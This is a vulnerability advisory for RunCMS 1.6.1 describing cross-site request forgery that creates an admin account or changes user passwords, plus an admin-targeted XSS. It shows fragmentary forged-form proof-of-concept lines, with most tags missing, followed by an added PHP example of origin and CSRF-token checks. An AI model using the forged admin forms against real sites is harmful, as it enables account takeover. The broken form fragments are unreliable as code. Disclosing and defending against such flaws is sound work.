RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilities






###################################################################
RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilities          by NBBN
###################################################################

1) Create Webmaster (admin) XSRF Vulnerability

action="http://localhost/xampp/runcms/modules/system/admin.php" method="post" enctype="multipart/form-data" name="r">
value="attack@attack.com">

With XSRF an attacker can also update the profile of all users, for example to change the password.

2) Cross-Site Scripting (an attacker can only attack an admin)

action="http://localhost/xampp/runcms/modules/system/admin.php" method="post" enctype="multipart/form-data" name="r">
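
One way to close the hole described in item 1, shown as an added example that is not code from RunCMS or from the advisory: reject any admin POST that does not come from the site's own origin and carry a per-session token. The function names, the `csrf_token` and `email` fields and the sample requests are assumptions made for illustration; it needs PHP 7 or later.

```php
<?php
// Added example, not RunCMS code: deny state-changing admin POSTs that lack
// a same-origin source and a per-session anti-CSRF token.

// Create (once per session) the token that legitimate admin forms embed.
function issue_csrf_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Compare scheme://host[:port] of Origin (or Referer) with the site's origin.
function is_same_origin(array $server, string $siteOrigin): bool {
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $p = parse_url($source);
    if (!is_array($p) || empty($p['scheme']) || empty($p['host'])) {
        return false; // header missing, "null", or unparsable
    }
    $origin = strtolower($p['scheme'] . '://' . $p['host'])
            . (isset($p['port']) ? ':' . $p['port'] : '');
    return $origin === strtolower($siteOrigin);
}

// Gate to call before the admin script acts on any POST.
function admin_post_allowed(array $server, array $post, array $session, string $siteOrigin): bool {
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') return false;
    if (!is_same_origin($server, $siteOrigin)) return false;
    $known = $session['csrf_token'] ?? '';
    $sent  = $post['csrf_token'] ?? '';
    return is_string($sent) && $known !== '' && hash_equals($known, $sent);
}

// Constructed requests ("email" is a hypothetical field name).
$session = [];
$token   = issue_csrf_token($session);
$site    = 'http://localhost';
$fromAdminUi = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://localhost'];
$crossSite   = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://other-site.example'];

// Same-origin form that carries the session token.
var_dump(admin_post_allowed($fromAdminUi, ['email' => 'a@example.org', 'csrf_token' => $token], $session, $site));
// Auto-submitted form hosted on another site: wrong origin, no token.
var_dump(admin_post_allowed($crossSite, ['email' => 'attack@attack.com'], $session, $site));
// Right origin but token absent, e.g. a form injected through the XSS in item 2.
var_dump(admin_post_allowed($fromAdminUi, ['email' => 'attack@attack.com'], $session, $site));
```

In a live handler the three arrays would be `$_SERVER`, `$_POST` and `$_SESSION`.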

